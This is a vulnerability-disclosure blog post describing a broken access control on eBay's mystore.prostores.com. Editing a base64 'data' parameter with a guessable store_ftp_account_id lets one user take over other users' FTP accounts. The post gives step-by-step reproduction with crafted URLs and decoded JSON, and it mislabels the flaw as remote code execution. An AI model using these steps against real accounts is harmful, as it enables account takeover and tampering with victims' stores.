Unveiling a Logical Vulnerability on eBay mystore.prostores.com Leads to Account Compromise

Introduction

In the realm of cybersecurity, the hunt for vulnerabilities is an ongoing challenge, and as part of my journey as a security researcher, I unearthed a security flaw on eBay mystore.prostores.com. This vulnerability, which allows for remote code execution, poses a significant threat to the platform's integrity. In this blog post, I will share the details of this alarming discovery, the steps to reproduce it, and its potential impact.

Understanding the Logical Vulnerability

Before we delve into the specifics of this vulnerability, it's essential to understand the gravity of logical vulnerabilities. Logical vulnerabilities, also known as logical flaws, are cybersecurity weaknesses that stem from errors or inadequacies in the design, configuration, or behavior of a software system or application. Unlike traditional technical vulnerabilities that result from coding errors or software bugs, logical vulnerabilities are related to how the system processes and manages data or user interactions.

These vulnerabilities often include issues like inadequate access controls, inconsistent data validation, business logic flaws, insecure authentication mechanisms, and improper session management. Addressing logical vulnerabilities requires a deep understanding of the system's intended logic and potential misuse scenarios, making them more challenging to detect and mitigate. This type of security flaw is a serious concern in the cybersecurity landscape.

The Discovery

During a routine exploration of mystore.prostores.com, I came across an Logical vulnerability that allowed me to change the passwords of FTP accounts associated with any mystore.prostores.com user. Furthermore, this flaw enabled me to compromise these FTP accounts, manipulate their settings, and gain access to, modify, or delete the data and content hosted on users' stores (websites) without their knowledge or consent.

Steps to Reproduce the Vulnerability

1. Begin by accessing the following URL while logged into any test account, such as 'testuser1':

https://mystore.prostores.com/CP/ftp_user.php?data=eyJmdHBfdXNlcm5hbWUiOiIiLCJzeXN0ZW1fY29udGVudF9mbGFnIjoiMSIsImxvY2tlZF9mbGFnIjoiMCIsIndlYl_9jb250ZW50X2ZsYWciOiIxIiwic3RvcmVfZnRwX2FjY291bnRfaWQiOiIxMzk0IiwiZnRwX2VtYWlsIjoiIn0=

(Note: This URL is accessible through the 'testeruser2' test account, where the 'testftpuser1' FTP account is created.)

2. Subsequently, you will gain access to the 'testftpuser1' FTP account using your 'testuser1' account, which originated from 'testuser2.'

3. You can then proceed to modify the password, email, or disable the 'testftpuser1' FTP account.

4. To access other users' FTP accounts, follow these steps:

i) The data parameter value is encoded in base64, as follows:

https://mystore.prostores.com/CP/ftp_user.php?data=eyJmdHBfdXNlcm5hbWUiOiJ0ZXN0YWJjZHRlc3RhYmNkIiwic3lzdGVtX2NvbnRlbnRfZmxhZyI6IjEiLCJsb2NrZWRfZmxhZyI6IjAiLCJ3ZWJfY29udGVudF9mbGFnIjoiMSIsInN0b3JlX2Z0cF9hY2NvdU50X2lkIjoiMTM5NCIsImZ0cF9lbWFpbCI6ImFqYXlzaW5naG5lZ2kwMUBnbWFpbC5jb20ifQ==

ii) Decrypting this base64 value reveals:

{       
"ftp_username": "testftpuser1",       
"system_content_flag": "1",       
"locked_flag": "0",       
"web_content_flag": "1",       
"store_ftp_account_id": "1394",       
"ftp_email": "testuser1@cyfinitilabs.com"
}

iii) To access other users' FTP accounts, the attacker sets the 'ftp_username' value to null, as well as the 'ftp_email' value, and predictably changes the 'store_ftp_account_id' to 1394 or 1393, as this 'store_ftp_account_id' is both incremental and decremental (making it predictable and guessable).

iv) This crafting results in the decrypted base64 value appearing as:

{       
"ftp_username": "",       
"system_content_flag": "1",       
"locked_flag": "0",       
"web_content_flag": "1",       
"store_ftp_account_id": "1394",       
"ftp_email": ""     
}     

v) The attacker then encodes this crafted, decrypted base64 value to base64 format:

https://mystore.prostores.com/CP/ftp_user.php?data=eyJmdHBfdXNlcm5hbWUiOiIiLCJzeXN0ZW1fY29udGVudF9mbGFnIjoiMSIsImxvY2tlZF9mbGFnIjoiMCIsIndlYl_9jb250ZW50X2ZsYWciOiIxIiwic3RvcmVfZnRwX2FjY291bnRfaWQiOiIxMzk0IiwiZnRwX2VtYWlsIjoiIn0=

vi) Next, the attacker adds this base64 value to the following URL:

https://mystore.prostores.com/CP/ftp_user.php?data=base64value

vii) The attacker can then open this URL using any of their 'mystore.prostores.com' accounts. Subsequently, they can effortlessly access the victim's FTP account, modify the password and email, and even disable the account. This method allows the attacker to easily change the password of any FTP account for 'mystore.prostores.com' users, potentially compromising their FTP accounts, and enabling them to delete or modify the data and content hosted on their stores (websites).

Final URL: https://mystore.prostores.com/CP/ftp_user.php?data=base64value

Impact

The ramifications of this vulnerability are severe. An attacker can easily change the passwords of FTP accounts belonging to mystore.prostores.com users, compromising their FTP accounts. Additionally, the attacker can change the password, email, disable the FTP account access, modify, delete data, and content hosted on users' stores, including websites.

Conclusion

The discovery of this logical vulnerability on mystore.prostores.com underscores the importance of continuous security research and responsible disclosure. This blog aims to shed light on the potential risks associated with such vulnerabilities and encourage platform owners to strengthen their security measures. Logical vulnerabilities pose a significant threat to user data and platform integrity, and immediate action is necessary to safeguard both users and organizations relying on these services.